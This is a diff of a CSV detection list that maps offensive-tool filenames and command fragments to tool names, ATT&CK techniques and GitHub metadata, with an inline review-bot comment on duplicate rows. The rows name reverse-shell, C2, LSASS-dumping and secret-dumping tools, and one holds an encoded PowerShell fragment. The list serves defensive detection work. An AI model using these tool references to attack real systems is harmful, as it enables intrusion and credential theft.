needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe 
list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irsl/curlshell*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*is_kirbi_file*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*is_proxy_stub_dll_loaded*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*isShellcodeThread*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" -"*issue_shell_whoami*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*issue_shell_whoami*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - 
T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*Itay Migdal*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*itm4n/PrintSpoofer*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*itm4n/PrintSpoofer*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*itm4n/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*itm4nprivesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*its-a-feature/Apfell*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*itm4n/PrintSpoofer*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*itm4n/PrintSpoofer*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*itm4n/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*itm4nprivesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*its-a-feature/Apfell*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*itsKindred*","offensive_tool_keyword","Github Username","gthub username hosting malware samples and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/itsKindred","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ItsNee/Follina-CVE-2022-30190-POC*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" -"*itunes_backup2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*itunes_backup2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*itwasalladream -u * -p * -d *","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*itwasalladream*bogus.dll*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. 
Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*ItWasAllADream-master*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*IUnknownObj.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*iwork2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*iwork2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) 
C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*jackdaw --*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" "*jackdaw.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" 
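Review bot: The two added `*irs.exe list*` rows for impersonate-rs are byte-identical, so this refresh carries a duplicate keyword forward; one of them should be dropped so a single match is not reported twice. `*itm4n/PrintSpoofer*` and `*its-a-feature/Mythic*` are likewise each listed twice in the hunk, with a different `metadata_tool` case or a different technique list, which leaves any consumer that keys on `keyword` with an arbitrary pick between the two. The mythic rows also write sub-techniques with a hyphen (`T1573-001`) where the rest of the file uses a dot (`T1548.002`), so they will not join against ATT&CK IDs; `T1573.001` is the form to use, and the `-003` to `-005` entries look like they have no matching sub-technique and should be checked. The hunk covers only part of the file, so other rows may need the same pass.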
@@ -12506,83 +12662,83 @@
 "*jas502n/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z"
 "*jatayu.php*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z"
 "*jatayu-image.png*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z"
-"*java -jar BeaconTool.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
-"*java/jndi/LDAPRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","715","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z"
-"*java-deserialization-exploits*","offensive_tool_keyword","java-deserialization-exploits","A collection of curated Java Deserialization Exploits","T1029 - T1529 - T1569 - T1218","TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research/java-deserialization-exploits","1","0","N/A","N/A","6","583","263","2021-05-16T23:10:49Z","2016-05-31T16:23:08Z"
-"*javascript-obfuscator*","offensive_tool_keyword","javascript-obfuscator","JavaScript Obfuscator is a powerful free obfuscator for JavaScript. containing a variety of features which provide protection for your source code.","T1027","TA0010","N/A","N/A","Defense Evasion","https://github.com/javascript-obfuscator/javascript-obfuscator","1","0","N/A","N/A","10","11761","1384","2023-09-05T17:32:26Z","2016-05-09T08:16:53Z"
-"*jboss_jmx_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*jdk*-activator-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
-"*jdk*-call-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
-"*jdk*-dgc-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
-"*jdk*-method-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
-"*jdk*-reg-bypass.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*java -jar BeaconTool.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
+"*java/jndi/LDAPRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background 
services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z"
+"*java-deserialization-exploits*","offensive_tool_keyword","java-deserialization-exploits","A collection of curated Java Deserialization Exploits","T1029 - T1529 - T1569 - T1218","TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research/java-deserialization-exploits","1","0","N/A","N/A","6","583","262","2021-05-16T23:10:49Z","2016-05-31T16:23:08Z"
+"*javascript-obfuscator*","offensive_tool_keyword","javascript-obfuscator","JavaScript Obfuscator is a powerful free obfuscator for JavaScript. containing a variety of features which provide protection for your source code.","T1027","TA0010","N/A","N/A","Defense Evasion","https://github.com/javascript-obfuscator/javascript-obfuscator","1","0","N/A","N/A","10","11763","1384","2023-09-05T17:32:26Z","2016-05-09T08:16:53Z"
+"*jboss_jmx_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*jdk*-activator-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*jdk*-call-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*jdk*-dgc-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*jdk*-method-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*jdk*-reg-bypass.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
 "*jdwp-shellifier.py -t * -p * --cmd *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*jedisct1*","offensive_tool_keyword","Github Username","github username. a knack for cryptography. computer vision. opensource software and infosec. 
hosting infosec tools used by pentester","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/jedisct1","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*jfjallid/go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z"
+"*jfjallid/go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z"
 "*JGillam/burp-co2*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z"
 "*Jira-Lens.py*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z"
